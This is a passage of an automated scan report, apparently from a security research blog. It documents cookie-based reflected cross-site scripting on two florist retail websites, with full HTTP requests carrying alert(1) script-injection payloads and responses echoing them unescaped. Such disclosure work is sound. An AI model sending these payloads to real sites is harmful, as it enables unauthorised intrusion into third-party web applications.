X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:41:57 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:41:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:41:57 GMT
Content-Length: 164424


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.links="30050119;30007363;30048203;30049945;41213;30043943;";
resx.itemid = "30050119";
resx.qty="1";
resx.price="29.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f48ef4</script><script>alert(1)</script>fc8f59adbce";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HIC";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...
1.126. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59bff</script><script>alert(1)</script>8b3e455c6b7 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f59bff</script><script>alert(1)</script>8b3e455c6b7; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:59:25 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:59:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:59:25 GMT
Content-Length: 155561


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Product";
resx.links="30007357;30007828;41213;30043943;30050119;";
resx.itemid = "30007357";
resx.qty="1";
resx.price="29.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f59bff</script><script>alert(1)</script>8b3e455c6b7";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HPM";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...
1.127. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /products/tulip_rainbow.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8173"%3balert(1)//95ac6cbaf33c38076 was submitted in the ref_code cookie. This input was echoed as e8173";alert(1)//95ac6cbaf33c38076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/tulip_rainbow.htm?order_prod_num=FYF-MIXTUL&order_prod_size=r&order_upgrds%5Bm%5D%5Bqty%5D=&order_upgrds%5Bm%5D%5Bopt%5D=&order_upgrds%5Bl%5D%5Bqty%5D=&order_upgrds%5Bl%5D%5Bopt%5D=&order_upgrds%5Bc%5D%5Bopt%5D=&order_upgrds%5Bt%5D%5Bopt%5D=&order_d_card_type=Blank+Card&order_d_recip=&remLen=175&order_d_card_msg=&remChars=175&order_d_card_sig=&order_d_zip=&continue.x=66&continue.y=20 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/products/tulip_rainbow.htm
Cache-Control: max-age=0
Origin: http://www.floristexpress.net
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORDe8173"%3balert(1)//95ac6cbaf33c38076; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Aproduct%25253AFYF-MIXTUL%2526pidt%253D1%2526oid%253Dhttp%25253A//a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/btn_buynow.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:55:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c2d443072044e030c1ee1ec63640d40a; path=/
Content-Type: text/html
Content-Length: 32960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Tulip Rainbow at FloristExpress.Net<
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="D";
s.eVar36="ORDe8173";alert(1)//95ac6cbaf33c38076";
s.eVar40="";
s.eVar47="";

s.products=";FYF-MIXTUL;;;event5=1;";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...
Report generated by XSS.CX Research Blog at Fri Feb 11 15:28:03 CST 2011.